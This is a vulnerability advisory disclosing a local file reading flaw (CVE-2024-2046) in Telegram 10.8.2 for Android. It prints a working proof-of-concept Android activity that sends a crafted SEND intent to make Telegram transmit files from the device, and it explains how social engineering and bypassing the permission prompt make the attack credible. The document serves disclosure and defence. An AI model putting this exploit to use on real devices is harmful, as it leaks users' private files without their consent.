Telegram 10.8.2 - LFR via chat attachment
Summary
| Name | Telegram 10.8.2 - LFR via chat attachment |
| Code name | |
| Product | Telegram |
| Affected versions | Version 10.8.2 |
| State | Public |
| Release date | 2024-03-19 |
Vulnerability
| Kind | Business information leak |
| Rule | |
| Remote | Yes |
| CVSSv3.1 Vector | CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N |
| CVSSv3.1 Base Score | 4.4 |
| Exploit available | Yes |
| CVE ID(s) |
Description
Telegram version 10.8.2 allows obtaining internal files from the user's device without their consent. This is possible because the app is vulnerable to Local File Reading via chat attachments.
Vulnerability
An arbitrary local file reading (LFR) vulnerability has been identified in Telegram. The exploit allows an attacker to obtain internal application files such as documents, files, images, downloads, etc.
Exploit
[...]
public class MainActivity extends AppCompatActivity {
[...]
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
[...]
// Hacking Here
StrictMode.setVmPolicy(StrictMode.VmPolicy.LAX);
Intent intent = new Intent("android.intent.action.SEND");
intent.setClassName("org.telegram.messenger.web","org.telegram.ui.LaunchActivity");
intent.putExtra(Intent.EXTRA_STREAM, Uri.parse("file:///sdcard/Telegram/Telegram Files/test.txt"));
intent.putExtra("dialogId", (long)1);
intent.putExtra(Intent.EXTRA_SUBJECT, "Hacked");
intent.putExtra(Intent.EXTRA_TEXT, "By cbelloatfluid");
startActivity(intent);
}
[...]
}
Evidence of exploitation
We can see how a malicious application installed on the victim's device can force the user to leak files from the device to a certain contact.
We studied how to force automatic sending to anyone using Telegram, however an internal hash of the vicitm must be known, and this is totally unpredictable and not exposed.
In short, with a bit of social engineering, a malicious contact could persuade his victim to get the files from the device without his authorization.
Since Telegram does not allow obtaining internal files from the app, this exploit seeks to use Telegram as a bridge between the attacker and the folder where Telegram stores all the files, images and documents that the user downloads from the app.
In this way, we are spared the "Do you authorize the application to access the folder?" prompt. This makes social engineering much more credible.
Our security policy
We have reserved the ID CVE-2024-2046 to refer to this issue from now on.
System Information
-
Version: Telegram 10.8.2
-
Operating System: Android
Mitigation
There is currently no patch available for this vulnerability.
Credits
The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.
References
Vendor page https://github.com/DrKLO/Telegram/
Timeline
2024-02-29
Vulnerability discovered.
2024-02-29
Vendor contacted.
2024-03-19
Public Disclosure.
